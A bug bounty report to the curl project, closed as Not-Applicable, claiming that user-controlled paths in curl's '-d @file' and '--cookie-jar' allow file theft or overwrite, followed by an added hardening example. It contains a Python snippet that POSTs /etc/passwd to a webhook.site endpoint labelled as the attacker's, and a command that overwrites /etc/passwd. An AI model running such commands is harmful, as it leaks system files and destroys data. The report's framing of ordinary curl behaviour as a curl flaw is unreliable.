
Arbitrary File Read via Unsanitized curl Usage Results in Sensitive File Exposure

curl
Reported by ednaq

Vulnerability Details

Technical details and impact analysis

External Control of File Name or Path
Hello team,

First of all, your open report policy has helped me improve a lot. Your very caring team has motivated me a lot. A real bug bounty program. I hope I can contribute something to you with this report. Thank you.

The application uses curl in a way that allows an attacker to specify arbitrary file paths as input for parameters like `--cookie-jar` or via POST data (`-d @file`). If untrusted user input is passed to these arguments, it is possible to overwrite sensitive files or exfiltrate server files to an external attacker-controlled server. This can lead to sensitive data disclosure or denial of service.

## Impact

- Sensitive file disclosure (exfiltration of /etc/passwd or other files).
- Overwriting critical files (e.g., authorized_keys, .env, configuration files).
- Potential supply chain compromise in automated build or CI environments.

## Attack Scenario

Example 1: File Exfiltration with POST

If user input controls the file path (e.g. the filename or data argument in a curl command):

```python
import subprocess

# Attacker's endpoint
webhook_url = "https://webhook.site/fd9dfaf1-7ed0-446e-9c6f-e182f6b11e4e"

# Attacker-chosen path that ends up in curl's "-d @file" argument
file_path = "/etc/passwd"

cmd = [
    "curl",
    "-X", "POST",
    "-d", f"@{file_path}",  # curl reads the named file and sends its contents as the request body
    webhook_url,
]
subprocess.run(cmd, check=True)
```

Result: The entire contents of /etc/passwd are POSTed to the attacker's server. This can be any sensitive file on the system.

Example 2: Overwriting Files with --cookie-jar

If an attacker can control the filename passed to `--cookie-jar`:

```bash
curl --cookie-jar /etc/passwd https://example.com
```

Result: The target file (/etc/passwd) is overwritten with a cookie file, destroying its original content. If this is a critical file, the application/system may become unusable.

## Recommendation

Never use unsanitized user input in system commands, especially file paths. Sanitize and validate all file inputs. If you must allow user-supplied files, use strict whitelisting and store files in isolated, non-sensitive directories. Avoid passing user input directly to the curl command line without checks.
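As an added example (not part of the submitted report and not curl's own code), the hardened counterpart to the two scenarios above: the reported `-d @file` pattern is shown beside a version that maps an untrusted name onto a file inside an application-owned directory before it reaches `-d @...` or `--cookie-jar`, refuses names curl would treat as an option or a file reference, and follows symlinks so a link planted in the directory cannot point back at /etc/passwd. The directories `/var/app/uploads` and `/var/app/cookies` and all function names are assumptions for illustration only.

```python
import os
import subprocess
from pathlib import Path
from typing import Optional

# Assumed for this example: isolated directories the application owns. Nothing
# security-relevant lives under them, so even a mistaken write there is harmless.
UPLOAD_ROOT = Path("/var/app/uploads").resolve()
COOKIE_ROOT = Path("/var/app/cookies").resolve()


def vulnerable_post_cmd(user_path: str, url: str) -> list:
    """The reported pattern: the user-controlled string lands in '-d @...',
    so '/etc/passwd' makes curl read and POST that file."""
    return ["curl", "-X", "POST", "-d", f"@{user_path}", url]


def contained_path(root: Path, user_name: str) -> Path:
    """Map an untrusted name onto a file strictly inside `root`, or raise ValueError.

    Rejects anything with path components ('../x', '/etc/passwd'), the '.' and
    '..' entries, names curl would parse as an option or file reference
    ('-o', '@/etc/passwd'), and symlinks that resolve outside `root`.
    """
    if not user_name or user_name in (".", "..") or user_name != os.path.basename(user_name):
        raise ValueError(f"rejected path components in {user_name!r}")
    if user_name.startswith(("-", "@")):
        raise ValueError(f"rejected option/file-reference prefix in {user_name!r}")
    candidate = (root / user_name).resolve()  # follows symlinks before the check
    if candidate.parent != root:
        raise ValueError(f"{user_name!r} resolves outside {root}")
    return candidate


def is_accepted(root: Path, user_name: str) -> bool:
    """True if `user_name` passes contained_path(); used to exercise the policy."""
    try:
        contained_path(root, user_name)
        return True
    except ValueError:
        return False


def safe_post_cmd(user_name: str, url: str) -> list:
    """POST a file from UPLOAD_ROOT. curl only ever sees a path this code built."""
    path = contained_path(UPLOAD_ROOT, user_name)
    return ["curl", "--fail", "--silent", "--show-error", "-X", "POST",
            "--data-binary", f"@{path}", url]


def safe_cookie_jar_cmd(user_name: str, url: str) -> list:
    """Write cookies only into COOKIE_ROOT, never to a caller-chosen path."""
    path = contained_path(COOKIE_ROOT, user_name)
    return ["curl", "--fail", "--silent", "--show-error", "--cookie-jar", str(path), url]


def stdin_post_cmd(url: str) -> list:
    """When the body itself is the untrusted input, feed it on stdin ('@-') so
    curl never opens a file whose name the user influenced."""
    return ["curl", "--fail", "--silent", "--show-error", "-X", "POST",
            "--data-binary", "@-", url]


def run(cmd: list, data: Optional[bytes] = None) -> subprocess.CompletedProcess:
    """Execute one of the commands above as an argument list, never a shell string."""
    return subprocess.run(cmd, input=data, check=True, capture_output=True)
```

Usage: `run(safe_post_cmd(name, url))` for a stored upload, `run(stdin_post_cmd(url), data=user_bytes)` when the request body is the user's data. Either way the `@` prefix is written by the application, not by the user, and the only paths curl opens are under the two application-owned directories.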

Report Details

Additional information and metadata

State

Closed

Substate

Not-Applicable

Weakness

External Control of File Name or Path